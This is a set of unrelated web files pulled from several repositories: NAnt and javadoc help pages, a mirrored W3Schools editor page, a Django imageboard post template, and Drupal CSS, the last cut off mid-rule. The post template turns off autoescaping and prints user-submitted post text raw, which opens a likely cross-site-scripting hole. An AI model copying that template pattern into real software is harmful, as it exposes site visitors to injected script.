doc/help/functions/operating-system.get-version(System.OperatingSystem).html
Sectoid/debian-nant
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!-- Documenting GetVersion--> <head> <meta http-equiv="Content-Language" content="en-ca" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="../style.css" /> <title>operating-system::get-version Function</title> </head> <body> <table width="100%" border="0" cellspacing="0" cellpadding="2" class="NavBar"> <tr> <td class="NavBar-Cell"> <a href="http://nant.sourceforge.net"> <b>NAnt</b> </a> <img alt="-&gt;" src="../images/arrow.gif" /> <a href="../index.html">Help</a> <img alt="-&gt;" src="../images/arrow.gif" /> <a href="index.html">Function Reference</a> <img alt="-&gt;" src="../images/arrow.gif" /> operating-system::get-version</td> <td class="NavBar-Cell" align="right"> v0.91-nightly-2010-10-29</td> </tr> </table> <h1>operating-system::get-version</h1> <p class="topicstatus">[This is preliminary documentation and subject to change.]</p> <p> Gets a <a href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemVersionClassTopic.asp">Version</a> object that identifies this operating system. </p> <h3>Usage</h3> <code> <a href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemVersionClassTopic.asp">Version</a> operating-system::get-version(<span class="parameter">operatingSystem</span>) </code> <p /> <h3>Parameters</h3> <div class="table"> <table> <tr> <th>Name</th> <th>Type</th> <th>Description</th> </tr> <tr> <td>operatingSystem</td> <td> <a href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemOperatingSystemClassTopic.asp">OperatingSystem</a> </td> <td>The operating system.</td> </tr> </table> </div> <h3>Return Value</h3> A <a href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemVersionClassTopic.asp">Version</a> object that describes the major version, minor version, build, and revision of the operating system. <h3>Requirements</h3><div style="margin-left: 20px;"><b>Assembly:</b> NAnt.Core (0.91.3954.0) </div><h3>See Also</h3><a href="../functions/environment.get-operating-system().html">environment::get-operating-system()</a></body> </html>
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/cssref/tryit4851.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="en-US"> <!-- Mirrored from www.w3schools.com/cssref/tryit.asp?filename=trycss_js_border-top-color by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:51:11 GMT --> <head> <title>Tryit Editor v2.3</title> <meta id="viewport" name='viewport'> <script> (function() { if ( navigator.userAgent.match(/iPad/i) ) { document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9"); } }()); </script> <link rel="stylesheet" href="../trycss.css"> <!--[if lt IE 8]> <style> .textareacontainer, .iframecontainer {width:48%;} .textarea, .iframe {height:800px;} #textareaCode, #iframeResult {height:700px;} .menu img {display:none;} </style> <![endif]--> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','../../www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-3855518-1', 'auto'); ga('require', 'displayfeatures'); ga('send', 'pageview'); </script> <script> var googletag = googletag || {}; googletag.cmd = googletag.cmd || []; (function() { var gads = document.createElement('script'); gads.async = true; gads.type = 'text/javascript'; var useSSL = 'https:' == document.location.protocol; gads.src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js'; var node = document.getElementsByTagName('script')[0]; node.parentNode.insertBefore(gads, node); })(); </script> <script> googletag.cmd.push(function() { googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads()); googletag.pubads().setTargeting("content","trycss"); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> <script type="text/javascript"> function submitTryit() { var t=document.getElementById("textareaCode").value; t=t.replace(/=/gi,"w3equalsign"); var pos=t.search(/script/i) while (pos>0) { t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6); pos=t.search(/script/i); } if ( navigator.userAgent.match(/Safari/i) ) { t=escape(t); document.getElementById("bt").value="1"; } document.getElementById("code").value=t; document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random(); validateForm(); document.getElementById("iframeResult").contentWindow.name = "view"; document.getElementById("tryitform").submit(); } function validateForm() { var code=document.getElementById("code").value; if (code.length>8000) { document.getElementById("code").value="<h1>Error</h1>"; } } </script> <style> </style> </head> <body> <div id="ads"> <div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;"> <div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;"> <!-- TryitLeaderboard --> <div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'> <script type='text/javascript'> googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); }); </script> </div> <div style="clear:both"></div> </div> </div> </div> <div class="container"> <div class="textareacontainer"> <div class="textarea"> <div class="headerText" style="width:auto;float:left;">Edit This Code:</div> <div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result &raquo;</button></div> <div class="textareawrapper"> <textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html> <html> <head> <style> #myDIV { border: 3px solid black; width: 300px; height: 300px; } </style> </head> <body> <p>Click the "Try it" button to change the border-top-color property of the DIV element:</p> <button onclick="myFunction()">Try it</button> <div id="myDIV"> <h1>Hello</h1> </div> <script> function myFunction() { document.getElementById("myDIV").style.borderTopColor = "lightblue"; } </script> </body> <!-- Mirrored from www.w3schools.com/cssref/tryit.asp?filename=trycss_js_border-top-color by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:51:11 GMT --> </html> </textarea> <form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/cssref/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();"> <input type="hidden" name="code" id="code" /> <input type="hidden" id="bt" name="bt" /> </form> </div> </div> </div> <div class="iframecontainer"> <div class="iframe"> <div class="headerText resultHeader">Result:</div> <div class="iframewrapper"> <iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="trycss_js_border-top-color.html"></iframe> </div> <div class="footerText">Try it Yourself - &copy; <a href="../index.html">w3schools.com</a></div> </div> </div> </div> <script>submitTryit()</script> </body> </html>
datasets/java/graduates/docs/corgis/graduates/domain/package-use.html
RealTimeWeb/datasets
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_101) on Sat Mar 17 00:05:59 EDT 2018 --> <title>Uses of Package corgis.graduates.domain (Graduates: version 1)</title> <meta name="date" content="2018-03-17"> <link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Package corgis.graduates.domain (Graduates: version 1)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../index.html?corgis/graduates/domain/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Uses of Package corgis.graduates.domain" class="title">Uses of Package<br>corgis.graduates.domain</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../corgis/graduates/domain/package-summary.html">corgis.graduates.domain</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#corgis.graduates">corgis.graduates</a></td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="#corgis.graduates.domain">corgis.graduates.domain</a></td> <td class="colLast">&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"><a name="corgis.graduates"> <!-- --> </a> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation"> <caption><span>Classes in <a href="../../../corgis/graduates/domain/package-summary.html">corgis.graduates.domain</a> used by <a href="../../../corgis/graduates/package-summary.html">corgis.graduates</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/GradMajor.html#corgis.graduates">GradMajor</a>&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"><a name="corgis.graduates.domain"> <!-- --> </a> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation"> <caption><span>Classes in <a href="../../../corgis/graduates/domain/package-summary.html">corgis.graduates.domain</a> used by <a href="../../../corgis/graduates/domain/package-summary.html">corgis.graduates.domain</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/Degrees.html#corgis.graduates.domain">Degrees</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/Demographics.html#corgis.graduates.domain">Demographics</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/EarningsBreakdown.html#corgis.graduates.domain">EarningsBreakdown</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/Education.html#corgis.graduates.domain">Education</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/EmployerType.html#corgis.graduates.domain">EmployerType</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/Employment.html#corgis.graduates.domain">Employment</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/Ethnicity.html#corgis.graduates.domain">Ethnicity</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/Gender.html#corgis.graduates.domain">Gender</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/ReasonForNotWorking.html#corgis.graduates.domain">ReasonForNotWorking</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/ReasonWorkingOutsideField.html#corgis.graduates.domain">ReasonWorkingOutsideField</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/Salaries.html#corgis.graduates.domain">Salaries</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/Status.html#corgis.graduates.domain">Status</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../corgis/graduates/domain/class-use/WorkActivity.html#corgis.graduates.domain">WorkActivity</a>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../index.html?corgis/graduates/domain/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
wsgi/openshift/templates/parts/post.html
Altai-man/kataba-fork
{% autoescape off %} <div class='post' id='p{{post.id}}'> <div class='post_header'> &nbsp; <div class='post_header_left'> {% if not post_show_answer %} <b class='white'>Anonymous</b> {% endif %} <span class='orange post_link'>#p{{post.id}}</span> {{post.date|date:"F d H:i:s"}} </div> {% if post_show_answer %} <div class='post_header_right'> <a href='/post/{{post.id}}'>Ответить</a> </div> {% endif %} </div> <div class='post_text'> {% if post.image1 %} <div class='img_cont'> <div> <a href="/images/{{post.image1.name}}">{{post.image1.name|slice:"2:"|truncatechars:19}} {{post.image1.width}}x{{post.image1.height}}</a> </div><img class='post_img' src='/images/thumbnails/{{post.image1.name}}' data-alt_name='/images/{{post.image1.name}}' alt='{{post.image1.name|slice:"2:"}}' /> </div> {% endif %} {% if post.image2 %} <div class='img_cont'> <div><a href="/images/{{post.image2.name}}">{{post.image2.name|slice:"2:"|truncatechars:19}} {{post.image2.width}}x{{post.image2.height}}</a></div> <img class='post_img' src='/images/thumbnails/{{post.image2.name}}' data-alt_name='/images/{{post.image2.name}}' alt='{{post.image2.name|slice:"2:"}}'> </div> {% endif %} {% if post.image3 %} <div class='img_cont'> <div> <a href="/images/{{post.image3.name}}">{{post.image3.name|slice:"2:"|truncatechars:19}} {{post.image3.width}}x{{post.image3.height}}</a> </div><img class='post_img' src='/images/thumbnails/{{post.image3.name}}' data-alt_name='/images/{{post.image3.name}}' alt='{{post.image3.name|slice:"2:"}}' /> </div> {% endif %} {% if post.image4 %} <div class='img_cont'> <div> <a href="/images/{{post.image4.name}}">{{post.image4.name|slice:"2:"|truncatechars:19}} {{post.image4.width}}x{{post.image4.height}}</a> </div><img class='post_img' src='/images/thumbnails/{{post.image4.name}}' data-alt_name='/images/{{post.image4.name}}' alt='{{post.image4.name|slice:"2:"}}' /> </div> {% endif %} {{post.text}} </div> </div> {% endautoescape %}
sites/all/themes/omega/omega/css/modules/system/system.base.css
HubDev/GC
/** * @file * System wide base styles. */ /** * @file * Base styles for autocomplete functionality. * * @see autocomplete.js */ /* Suggestion list */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/autocomplete\/_autocomplete\.base\.scss}line{font-family:\000039}} #autocomplete { position: absolute; z-index: 100; overflow: hidden; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/autocomplete\/_autocomplete\.base\.scss}line{font-family:\0000314}} #autocomplete ul { margin: 0; padding: 0; list-style: none; list-style-image: none; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/autocomplete\/_autocomplete\.base\.scss}line{font-family:\0000320}} #autocomplete li { cursor: default; white-space: pre; zoom: 1; /* IE7 */ } /* Animated throbber */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/autocomplete\/_autocomplete\.base\.scss}line{font-family:\0000328}} html.js .form-autocomplete { background-image: url('../../../images/misc/throbber.gif?1379970792'); background-position: 100% 2px; /* LTR */ background-repeat: no-repeat; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/autocomplete\/_autocomplete\.base\.scss}line{font-family:\0000333}} html.js .throbbing { background-position: 100% -18px; /* LTR */ } /** * @file * Base styles for collapsible fieldset functionality. * * @see collapse.js */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/collapsible\/_collapsible\.base\.scss}line{font-family:\000038}} html.js fieldset.collapsed { height: 1em; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/collapsible\/_collapsible\.base\.scss}line{font-family:\0000311}} html.js fieldset.collapsed .fieldset-wrapper { display: none; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/collapsible\/_collapsible\.base\.scss}line{font-family:\0000314}} fieldset.collapsible { position: relative; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/collapsible\/_collapsible\.base\.scss}line{font-family:\0000317}} fieldset.collapsible .fieldset-legend { display: block; } /** * @file * Base styles for the resizable textareas functionality. * * @see textarea.js */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/resizable\/_resizable\.base\.scss}line{font-family:\0000310}} .form-textarea-wrapper textarea { display: block; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; width: 100%; margin: 0; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/resizable\/_resizable\.base\.scss}line{font-family:\0000316}} .resizable-textarea .grippie { height: 9px; background: #eeeeee url('../../../images/misc/grippie.png?1379970792') no-repeat center 2px; border: 1px solid #ddd; border-top-width: 0; cursor: s-resize; overflow: hidden; } /** * @file * Base styling for the tabledrag behavior. * * @see tabledrag.js */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\000038}} body.drag { cursor: move; } /* Tabledrag Handle */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000312}} .tabledrag-handle { float: left; /* LTR */ overflow: hidden; text-decoration: none; cursor: move; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000318}} .tabledrag-handle .handle { height: 15px; width: 15px; margin: -0.4em 0; padding: 0.4em; background: url('../../../images/misc/draggable.png?1379970792') no-repeat 6px 9px; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000325}} .tabledrag-handle:hover { text-decoration: none; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000329}} .tabledrag-handle-hover .handle { background-position: 6px -11px; } /* Indentation */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000334}} .indentation { float: left; /* LTR */ width: 20px; } /* Tree Images */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000340}} .tree-child { background: url('../../../images/misc/tree.png?1379970792') no-repeat 12px center; /* LTR */ } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000343}} .tree-child-last { background: url('../../../images/misc/tree-bottom.png?1379970792') no-repeat 12px center; /* LTR */ } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000346}} .tree-child-horizontal { background: url('../../../images/misc/tree.png?1379970792') no-repeat -12px center; } /* Toggle Weight Link */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tabledrag\/_tabledrag\.base\.scss}line{font-family:\0000351}} .tabledrag-toggle-weight-wrapper { text-align: right; /* LTR */ } /** * @file * Base styling for the tableheader behavior. * * @see tableheader.js */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/tableheader\/_tableheader\.base\.scss}line{font-family:\000038}} .sticky-header { margin-top: 0; background-color: #fff; } /** * @file * Base styles for the progress behavior. * * @see progress.js */ /* Bar */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/progress\/_progress\.base\.scss}line{font-family:\0000310}} .progress .bar { background-color: #fff; border: 1px solid; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/progress\/_progress\.base\.scss}line{font-family:\0000314}} .progress .filled { height: 1.5em; width: 5px; background-color: #000; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/progress\/_progress\.base\.scss}line{font-family:\0000319}} .progress .percentage { float: right; /* LTR */ } /* Throbber */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/progress\/_progress\.base\.scss}line{font-family:\0000325}} .ajax-progress { display: inline-block; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/progress\/_progress\.base\.scss}line{font-family:\0000328}} .ajax-progress .throbber { float: left; /* LTR */ height: 15px; width: 15px; margin: 2px; background: transparent url('../../../images/misc/throbber.gif?1379970792') no-repeat 0px -18px; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/progress\/_progress\.base\.scss}line{font-family:\0000335}} .ajax-progress .message { padding-left: 20px; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/progress\/_progress\.base\.scss}line{font-family:\0000340}} tr .ajax-progress .throbber { margin: 0 2px; } @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/progress\/_progress\.base\.scss}line{font-family:\0000343}} .ajax-progress-bar { width: 16em; } /** * @file * System utility classes. */ /** * Inline items. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/utilities\/_utilities\.base\.scss}line{font-family:\0000312}} .container-inline div, .container-inline label { display: inline; } /* Fieldset contents always need to be rendered as block. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/utilities\/_utilities\.base\.scss}line{font-family:\0000316}} .container-inline .fieldset-wrapper { display: block; } /** * Prevent text wrapping. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/utilities\/_utilities\.base\.scss}line{font-family:\0000323}} .nowrap { white-space: nowrap; } /** * For anything you want to hide on page load when JS is enabled, so * that you can use the JS to control visibility and avoid flicker. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/utilities\/_utilities\.base\.scss}line{font-family:\0000331}} html.js .js-hide { display: none; } /** * Hide elements from all users. * * Used for elements which should not be immediately displayed to any user. An * example would be a collapsible fieldset that will be expanded with a click * from a user. The effect of this class can be toggled with the jQuery show() * and hide() functions. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/utilities\/_utilities\.base\.scss}line{font-family:\0000343}} .element-hidden { display: none; } /** * Hide elements visually, but keep them available for screen-readers. * * Used for information required for screen-reader users to understand and use * the site where visual display is undesirable. Information provided in this * manner should be kept concise, to avoid unnecessary burden on the user. * "!important" is used to prevent unintentional overrides. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/utilities\/_utilities\.base\.scss}line{font-family:\0000355}} .element-invisible { position: absolute !important; clip: rect(1px 1px 1px 1px); /* IE6, IE7 */ clip: rect(1px, 1px, 1px, 1px); overflow: hidden; height: 1px; } /** * The .element-focusable class extends the .element-invisible class to allow * the element to be focusable when navigated to via the keyboard. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/utilities\/_utilities\.base\.scss}line{font-family:\0000368}} .element-invisible.element-focusable:active, .element-invisible.element-focusable:focus { position: static !important; clip: auto; overflow: visible; height: auto; } /** * Use the clearfix from Compass. */ @media -sass-debug-info{filename{font-family:file\:\/\/\/home\/rod\/public_html\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/utilities\/_utilities\.base\.scss}line{font-family:\0000378}} .clearfix { *zoom: 1; } @media -sass-debug-info{filename{font-family:file\:\/\/\/var\/lib\/gems\/1\.8\/gems\/compass-0\.12\.2\/frameworks\/compass\/stylesheets\/compass\/utilities\/general\/_clearfix\.scss}line{font-family:\0000338}} .clearfix:after { content: ""; display: table; clear: both; }
core/modules/outside_in/css/off-canvas.button.css
jakegibs617/portfolio-drupal
/** * Visual styling for buttons in the off canvas tray. * * See seven/css/components/buttons.css */ #drupal-off-canvas button, #drupal-off-canvas .button { -webkit-appearance: none; -moz-appearance: none; margin: 0 0 10px; padding: 0; border: 0; box-shadow: none; font-family: "Lucida Grande", 'Lucida Sans Unicode', 'liberation sans', sans-serif; line-height: normal; text-transform: none; text-decoration: none; cursor: pointer; } #drupal-off-canvas button.link { display: inline; background: transparent; font-size: 14px; color: #85bef4; transition: color .5s ease; } #drupal-off-canvas button.link:hover, #drupal-off-canvas button.link:focus { color: #46a0f5; text-decoration: none; } #drupal-off-canvas input[type="submit"].button { display: inline-block; position: relative; width: 100%; height: auto; padding: 4px 20px; border: 0; border-radius: 20em; background: #777; font-weight: 600; font-size: 14px; color: #f5f5f5; text-align: center; cursor: pointer; transition: background .5s ease; } #drupal-off-canvas input[type="submit"].button:hover, #drupal-off-canvas input[type="submit"].button:focus, #drupal-off-canvas input[type="submit"].button:active { border: 0; color: #fff; text-decoration: none; outline: none; z-index: 10; } #drupal-off-canvas input[type="submit"].button:focus, #drupal-off-canvas input[type="submit"].button:active { box-shadow: 0 3px 3px 2px rgba(0,0,0,0.1); } #drupal-off-canvas input[type="submit"].button--primary { border: 0; background: #277abd; color: #fff; margin-top: 15px; } #drupal-off-canvas input[type="submit"].button--primary:hover, #drupal-off-canvas input[type="submit"].button--primary:focus, #drupal-off-canvas input[type="submit"].button--primary:active { background: #2b8bd8; outline: none; } #drupal-off-canvas .button-action:before { margin-left: -0.2em; /* LTR */ padding-right: 0.2em; /* LTR */ font-size: 14px; line-height: 16px; } [dir="rtl"] #drupal-off-canvas .button-action:before { margin-right: -0.2em; margin-left: 0; padding-right: 0; padding-left: 0.2em; } #drupal-off-canvas .no-touchevents .button--small 